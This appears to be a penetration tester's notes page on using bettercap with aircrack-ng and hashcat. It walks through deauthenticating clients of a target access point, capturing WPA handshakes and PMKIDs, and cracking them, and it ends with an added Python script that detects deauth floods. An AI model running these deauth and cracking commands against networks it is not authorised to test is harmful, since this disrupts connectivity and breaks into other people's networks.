# bettercap
[bettercap](https://www.bettercap.org/) is "The Swiss Army knife for WiFi, Bluetooth Low Energy, wireless HID hijacking, CAN-bus and IPv4 and IPv6 networks reconnaissance and MITM attacks."

:::warning
Totally under construction while I review bettercap's CLI and see what's still relevant.

:::

## Connect USB wifi to ESXi/Proxmox

In ESXi, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC".

## Kill processes on the Kali VM that might screw stuff up
Install aircrack-ng
```
sudo apt install aircrack-ng -y
```

Kill services that might conflict with wifi shenanigans
```
sudo airmon-ng check kill
```

## Start monitoring on the wifi card
Enumerate your wifi interface

```
iwconfig
```

Using the name of your wifi interface, start it in monitoring mode
```
sudo airmon-ng start wlan0
```

Check what your new monitoring interface is
```
iwconfig
```

*You'll likely see `wlan0mon` or something similar*

## Install via Go (Ubuntu 24.04)
```
sudo apt update
sudo apt install -y pkg-config libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
sudo apt install -y golang-go
go install github.com/bettercap/bettercap@latest
```

## Install/run using Docker
```
sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0
```

## Set the wifi capture file (warning: if you don't set this now and later want to change it, you have to RESTART wifi recon)
```
set wifi.handshakes.file /root/captures.pcap
```
## Set wifi.deauth.acquired to true (optional)
What I found during testing is that I would capture a lot of "half" handshakes but never the full ones. After reading this GitHub [issue](https://github.com/bettercap/bettercap/issues/889) I tried setting `set wifi.deauth.acquired true` and then I started getting full handshakes!
```
set wifi.deauth.acquired true
```
## Get wifi recon going!
```
wifi.recon on
```
### Troubleshooting tip
:::tip
I've run into some issues getting the `wifi.recon on` command to execute, due to some issues calling the `iw` executable. But I don't know that that's the actual issue. Reading further, I'm having problems like [this GitHub issue mentions](https://github.com/bettercap/bettercap/issues/614) where I try to put Bettercap into recon mode and it complains of `[17:58:47] [sys.log] [war] wifi could not set interface wlan0 txpower to 30, 'Set Tx Power' requests not supported`. So I followed a recommendation in that issue to install [this driver](https://github.com/aircrack-ng/rtl8812au) like this:

```
sudo apt-get install dkms -y
cd ~/
git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au                 # the clone lands in rtl8812au, not rtl
sudo make dkms_install       # registers the driver with DKMS so it survives kernel updates
make && sudo make install    # plain build/install; installing to /lib/modules needs root
```
:::

## Sort networks by number of clients connected
```
set wifi.show.sort clients desc
```
## Every second, clear our view and then present an updated list of nearby WiFi networks
```
set ticker.commands 'clear; wifi.show'
```
## Filter out client probes
```
events.ignore wifi.client.probe
```

## Filter out client disconnections
```
events.ignore wifi.client.lost
```

## Filter out new APs that come online
```
events.ignore wifi.ap.new
```

## Filter out new clients that come online
```
events.ignore wifi.client.new
```
## Filter out lost connections with APs
```
events.ignore wifi.ap.lost
```
## Show networks that ONLY start with 7MS:
```
set wifi.show.filter ^7MS
```

## Turn on ticker
```
ticker on
```
## Set channel to the one you're attacking
```
wifi.recon.channel X
```

## Disassociate all clients on a given BSSID to capture handshakes!
```
wifi.deauth 11:22:33:44:55:66
```
## Associate with the target to do the PMKID attack
```
wifi.assoc all
```
-or-
```
wifi.assoc 11:22:33:44:55:66
```

## Clear SSID filter
```
set wifi.show.filter ^
```
## Clear wifi.recon.channel filter
```
wifi.recon.channel clear
```
## Figure out the container ID for bettercap
```
sudo docker ps
```
## Copy files from docker to hard drive
First, make note of the container ID (shown as "XXX" below). If you didn't change the default path, you should be able to see captured files in the /root folder. Try listing them with:
```
sudo docker exec XXX ls /root/
```

Now you can copy them out of the container and into your current folder:
```
sudo docker cp XXX:/root/captures.pcap .
```
## Convert .pcap files to hccapx files
```
sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx
```

## Crack w/hashcat!
```
sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt
```

If that doesn't work, it looks like the new standard hash type might be 22000 (`-m 22000`) per [this hashcat forum thread](https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat:
```
sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap
```

One time I had problems with my .cap file from bettercap and had to do this to clean it up:
```
tshark -r my-cap-file-from-bettercap.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng
```
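As an added example (not code from this page or from bettercap), the script below shows what that tshark filter is actually selecting on, and the flip side of the `wifi.deauth` section above: it decodes the 802.11 frame-control byte into Wireshark's `wlan.fc.type_subtype` value, keeps only the management subtypes and EAPOL frames the filter keeps, and flags deauthentication bursts, which is the pattern a deauth attack leaves in a capture that a wireless IDS looks for. Every frame, timestamp and MAC address is constructed inline; the frame builder assumes plain three-address headers (no WDS/4-address frames).

```python
# Added example, not bettercap's code. Frames and MAC addresses below are constructed.
import struct
from collections import defaultdict

MGMT, CTRL, DATA = 0, 1, 2  # frame-control "type" field values

# wlan.fc.type_subtype packs the type into the high nibble and the subtype into the low one.
ASSOC_REQ, REASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON, DEAUTH = 0x00, 0x02, 0x04, 0x05, 0x08, 0x0C
KEEP_MGMT = {ASSOC_REQ, REASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON}  # the filter's management subtypes
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # LLC/SNAP header carrying EtherType 0x888E
BROADCAST = b"\xff" * 6


def mac(text):
    """'11:22:33:44:55:66' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def type_subtype(frame):
    """Return the wlan.fc.type_subtype value of a raw 802.11 frame."""
    fc = frame[0]                 # bits 0-1 version, bits 2-3 type, bits 4-7 subtype
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    return (ftype << 4) | subtype


def is_eapol(frame):
    """True for a data frame whose payload starts with the EAPOL LLC/SNAP header.
    Assumes a three-address (24-byte) header, i.e. ordinary AP <-> client traffic."""
    ts = type_subtype(frame)
    if ts >> 4 != DATA:
        return False
    hdr = 24 + (2 if ts & 0x08 else 0)  # QoS data subtypes add a 2-byte QoS control field
    return frame[hdr:hdr + 8] == LLC_SNAP_EAPOL


def keep(frame):
    """The page's tshark filter: a handful of management subtypes, plus EAPOL."""
    ts = type_subtype(frame)
    return (ts >> 4 == MGMT and ts in KEEP_MGMT) or is_eapol(frame)


def strip(frames):
    """Return the (timestamp, frame) pairs that survive the filter."""
    return [(t, f) for t, f in frames if keep(f)]


def deauth_bursts(frames, window=1.0, threshold=5):
    """Detection logic: transmitter addresses that sent at least `threshold` deauth
    frames inside any `window` seconds. Returns {transmitter MAC: peak count}.
    A deauth flood spoofs the AP's address, so the flagged MAC is the victim AP."""
    seen = defaultdict(list)
    for t, f in frames:
        if type_subtype(f) == DEAUTH:
            seen[fmt_mac(f[10:16])].append(t)  # addr2 = transmitter address
    bursts = {}
    for sender, times in seen.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):       # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[sender] = peak
    return bursts


def make_frame(ftype, subtype, addr1, addr2, addr3, body=b""):
    """Constructed 24-byte header (FC, duration, 3 addresses, sequence control) plus body."""
    fc = (ftype << 2) | (subtype << 4)
    return struct.pack("<BBH", fc, 0, 0) + addr1 + addr2 + addr3 + b"\x00\x00" + body


# Constructed sample capture: the AP BSSID from this page, a made-up second AP and client.
AP, OTHER_AP, CLIENT = mac("11:22:33:44:55:66"), mac("66:55:44:33:22:11"), mac("aa:bb:cc:dd:ee:01")
SAMPLE_FRAMES = [
    (0.00, make_frame(MGMT, BEACON, BROADCAST, AP, AP, b"\x00" * 12)),
    (0.10, make_frame(MGMT, PROBE_REQ, BROADCAST, CLIENT, BROADCAST)),
    (0.20, make_frame(DATA, 0x0, CLIENT, AP, AP, b"\xaa\xaa\x03\x00\x00\x00\x08\x00")),  # IPv4 data, not EAPOL
    (0.30, make_frame(DATA, 0x0, CLIENT, AP, AP, LLC_SNAP_EAPOL + b"\x02\x03\x00\x5f")),  # EAPOL-Key, AP -> client
    (0.31, make_frame(DATA, 0x8, AP, CLIENT, AP, b"\x00\x00" + LLC_SNAP_EAPOL + b"\x02\x03\x00\x75")),  # QoS-data EAPOL-Key
]
# Eight deauths in 0.35 s with the AP as transmitter: what a deauth attack leaves behind.
SAMPLE_FRAMES += [(0.50 + i * 0.05, make_frame(MGMT, DEAUTH, BROADCAST, AP, AP, b"\x07\x00")) for i in range(8)]
SAMPLE_FRAMES.append((5.00, make_frame(MGMT, DEAUTH, CLIENT, OTHER_AP, OTHER_AP, b"\x03\x00")))  # one ordinary deauth

if __name__ == "__main__":
    print(f"{len(strip(SAMPLE_FRAMES))} of {len(SAMPLE_FRAMES)} frames survive the filter")
    print("deauth bursts:", deauth_bursts(SAMPLE_FRAMES))
```

Note that deauthentication frames (subtype `0x0c`) are not on the filter's keep list, so `stripped.pcapng` will not show the burst even when the original capture does; keep the unstripped capture if you want to review it for that.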

Then convert from `.pcapng` to `.pcap`
```
editcap -F pcap stripped.pcapng stripped.pcap
```
